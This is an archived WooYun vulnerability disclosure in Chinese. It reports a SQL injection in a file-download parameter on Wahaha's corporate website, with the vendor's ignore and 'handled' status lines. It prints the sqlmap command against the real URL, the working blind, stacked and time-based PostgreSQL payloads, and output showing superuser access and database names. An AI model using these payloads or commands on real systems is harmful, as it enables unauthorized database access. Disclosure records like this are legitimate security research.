乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-26: 细节已通知厂商并且等待厂商处理中 2014-12-31: 厂商已经主动忽略漏洞,细节向公众公开
娃哈哈网站SQL注射漏洞
链接:http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx字段file_key未过滤。
sqlmap.py -u "http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx" --privilege --dbs
sqlmap identified the following injection points with a total of 288 HTTP(s) requests:---Parameter: file_key (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: file_key=20140619074133653296.docx' AND 6103=6103 AND 'ZhCy'='ZhCy&file_name=2014骞寸焊绠辨嫑鏍囧叕鍛?docx Type: stacked queries Title: PostgreSQL > 8.1 stacked queries Payload: file_key=20140619074133653296.docx'; SELECT PG_SLEEP(5)--&file_name=2014骞寸焊绠辨嫑鏍囧叕鍛?docx Type: AND/OR time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: file_key=20140619074133653296.docx' AND 5283=(SELECT 5283 FROM PG_SLEEP(5)) AND 'ovtB'='ovtB&file_name=2014骞寸焊绠辨嫑鏍囧叕鍛?docx---back-end DBMS: PostgreSQLdatabase management system users privileges:[*] postgres (administrator) [3]: privilege: catupd privilege: createdb privilege: superavailable databases [3]:[*] information_schema[*] pg_catalog[*] public
限制
危害等级:无影响厂商忽略
忽略时间:2014-12-31 14:50
2015-01-04:已处理